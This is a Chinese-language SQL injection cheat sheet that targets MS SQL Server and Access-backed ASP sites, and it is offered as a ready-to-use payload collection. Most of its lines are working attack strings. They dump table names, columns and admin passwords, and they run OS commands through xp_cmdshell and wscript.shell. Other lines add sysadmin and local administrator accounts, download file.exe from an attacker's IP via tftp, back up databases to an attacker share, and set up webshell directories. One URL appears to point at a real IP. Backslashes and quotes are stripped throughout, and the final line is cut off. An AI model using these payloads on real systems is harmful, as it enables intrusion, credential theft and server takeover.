Sql注射总结（强烈推荐）

Sql注射总结（强烈推荐）
Sql注射总结（早源于or1=1）

最重要的表名：
select * from sysobjects
sysobjects ncsysobjects
sysindexes tsysindexes
syscolumns
systypes
sysusers
sysdatabases
sysxlogins
sysprocesses

最重要的一些用户名（默认sql数据库中存在着的）
public
dbo
guest(一般禁止，或者没权限)
db_sercurityadmin
ab_dlladmin

一些默认扩展

xp_regaddmultistring
xp_regdeletekey
xp_regdeletevalue
xp_regenumkeys
xp_regenumvalues
xp_regread
xp_regremovemultistring
xp_regwrite
xp_availablemedia 驱动器相关
xp_dirtree 目录
xp_enumdsn ODBC连接
xp_loginconfig 服务器安全模式信息
xp_makecab 创建压缩卷
xp_ntsec_enumdomains domain信息
xp_terminate_process 终端进程，给出一个PID

例如：
sp_addextendedproc xp_webserver, c: empxp_foo.dll
exec xp_webserver
sp_dropextendedproc xp_webserver
bcp "select * FROM test..foo" queryout c:inetpubwwwroot uncommand.asp -c -Slocalhost -Usa -Pfoobar
group by users.id having 1=1-
group by users.id, users.username, users.password, users.privs having 1=1-
; insert into users values( 666, attacker, foobar, 0xffff )-

union select TOP 1 COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS where TABLE_NAME=logintable-
union select TOP 1 COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS where TABLE_NAME=logintable where COLUMN_NAME NOT IN (login_id)-
union select TOP 1 COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS where TABLE_NAME=logintable where COLUMN_NAME NOT IN (login_id,login_name)-
union select TOP 1 login_name FROM logintable-
union select TOP 1 password FROM logintable where login_name=Rahul--
构造语句：查询是否存在xp_cmdshell
union select @@version,1,1,1--
and 1=(select @@VERSION)
and sa=(select System_user)
union select ret,1,1,1 from foo--
union select min(username),1,1,1 from users where username > a-
union select min(username),1,1,1 from users where username > admin-
union select password,1,1,1 from users where username = admin--
and user_name()=dbo
and 0<>(select user_name()-
; DECLARE @shell INT EXEC SP_OAcreate wscript.shell,@shell OUTPUT EXEC SP_OAMETHOD @shell,run,null, C：WINNTsystem32cmd.exe /c net user swap 5245886 /add
and 1=(select count(*) FROM master.dbo.sysobjects where xtype = X AND name = xp_cmdshell)
;EXEC master.dbo.sp_addextendedproc xp_cmdshell, xplog70.dll

1=(%20select%20count(*)%20from%20master.dbo.sysobjects%20where%20xtype=x%20and%20name=xp_cmdshell)
and 1=(select IS_SRVROLEMEMBER(sysadmin)) 判断sa权限是否
and 0<>(select top 1 paths from newtable)-- 暴库大法
and 1=(select name from master.dbo.sysdatabases where dbid=7) 得到库名（从1到5都是系统的id，6以上才可以判断）
创建一个虚拟目录E盘：
declare @o int exec sp_oacreate wscript.shell, @o out exec sp_oamethod @o, run, NULL, cscript.exe c：inetpubwwwrootmkwebdir.vbs -w "默认 Web 站点" -v "e","e："
访问属性：（配合写入一个webshell）
declare @o int exec sp_oacreate wscript.shell, @o out exec sp_oamethod @o, run, NULL, cscript.exe c：inetpubwwwrootchaccess.vbs -a w3svc/1/ROOT/e +browse

and 0<>(select count(*) from master.dbo.sysdatabases where name>1 and dbid=6)
依次提交 dbid = 7,8,9.... 得到更多的数据库名
and 0<>(select top 1 name from bbs.dbo.sysobjects where xtype=U) 暴到一个表 假设为 admin

and 0<>(select top 1 name from bbs.dbo.sysobjects where xtype=U and name not in (Admin)) 来得到其他的表。
and 0<>(select count(*) from bbs.dbo.sysobjects where xtype=U and name=admin
and uid>(str(id))) 暴到UID的数值假设为18779569 uid=id
and 0<>(select top 1 name from bbs.dbo.syscolumns where id=18779569) 得到一个admin的一个字段,假设为 user_id
and 0<>(select top 1 name from bbs.dbo.syscolumns where id=18779569 and name not in
(id,...)) 来暴出其他的字段
and 0<(select user_id from BBS.dbo.admin where username>1) 可以得到用户名
依次可以得到密码。。。。。假设存在user_id username ,password 等字段

Show.asp?id=-1 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,* from admin
Show.asp?id=-1 union select 1,2,3,4,5,6,7,8,*,9,10,11,12,13 from admin
(union语句到处风靡啊，access也好用

暴库特殊技巧：:%5c= 或者把/和 修改%5提交
and 0<>(select count(*) from master.dbo.sysdatabases where name>1 and dbid=6)
and 0<>(select top 1 name from bbs.dbo.sysobjects where xtype=U) 得到表名
and 0<>(select top 1 name from bbs.dbo.sysobjects where xtype=U and name not in(Address))
and 0<>(select count(*) from bbs.dbo.sysobjects where xtype=U and name=admin and uid>(str(id))) 判断id值
and 0<>(select top 1 name from BBS.dbo.syscolumns where id=773577794) 所有字段

http://xx.xx.xx.xx/111.asp?id=3400;create table [dbo].[swap] ([swappass][char](255));--

http://xx.xx.xx.xx/111.asp?id=3400 and (select top 1 swappass from swap)=1
;create TABLE newtable(id int IDENTITY(1,1),paths varchar(500)) Declare @test varchar(20) exec master..xp_regread @rootkey=HKEY_LOCAL_MACHINE, @key=SYSTEMCurrentControlSetServicesW3SVCParametersVirtual Roots, @value_name=/, values=@test OUTPUT insert into paths(path) values(@test)

http://61.131.96.39/PageShow.asp?TianName=政策法规&InfoID={57C4165A-4206-4C0D-A8D2-E70666EE4E08};use%20master;declare%20@s%20%20int;exec%20sp_oacreate%20"wscript.shell",@s%20out;exec%20sp_oamethod%20@s,"run",NULL,"cmd.exe%20/c%20ping%201.1.1.1";--

得到了web路径d:xxxx,接下来：
http://xx.xx.xx.xx/111.asp?id=3400;use ku1;--
http://xx.xx.xx.xx/111.asp?id=3400;create table cmd (str image);--

传统的存在xp_cmdshell的测试过程：
;exec master..xp_cmdshell dir
;exec master.dbo.sp_addlogin hax;--
;exec master.dbo.sp_password null,hax,hax;--
;exec master.dbo.sp_addsrvrolemember hax sysadmin;--
;exec master.dbo.xp_cmdshell net user hax 5258 /workstations:* /times:all /passwordchg:yes /passwordreq:yes /active:yes /add;--
;exec master.dbo.xp_cmdshell net localgroup administrators hax /add;--
exec master..xp_servicecontrol start, schedule
exec master..xp_servicecontrol start, server
http：//www.xxx.com/list.asp?classid=1; DECLARE @shell INT EXEC SP_OAcreate wscript.shell,@shell OUTPUT EXEC SP_OAMETHOD @shell,run,null, C：WINNTsystem32cmd.exe /c net user swap 5258 /add
;DECLARE @shell INT EXEC SP_OAcreate wscript.shell,@shell OUTPUT EXEC SP_OAMETHOD @shell,run,null, C：WINNTsystem32cmd.exe /c net localgroup administrators swap/add

http://localhost/show.asp?id=1; exec master..xp_cmdshell tftp -i youip get file.exe-

declare @a sysname set @a=xp_+cmdshell exec @a dir c:
declare @a sysname set @a=xp+_cm+dshell exec @a dir c:
;declare @a;set @a=db_name();backup database @a to disk=你的IP你的共享目录bak.dat
如果被限制则可以。
select * from openrowset(sqloledb,server;sa;,select OK! exec master.dbo.sp_addlogin hax)
传统查询构造：
select * FROM news where id=... AND topic=... AND .....
adminand 1=(select count(*) from [user] where username=victim and right(left(userpass,01),1)=1) and userpass <>
select 123;--
;use master;--
:a or name like fff%;-- 显示有一个叫ffff的用户哈。
and 1<>(select count(email) from [user]);--
;update [users] set email=(select top 1 name from sysobjects where xtype=u and status&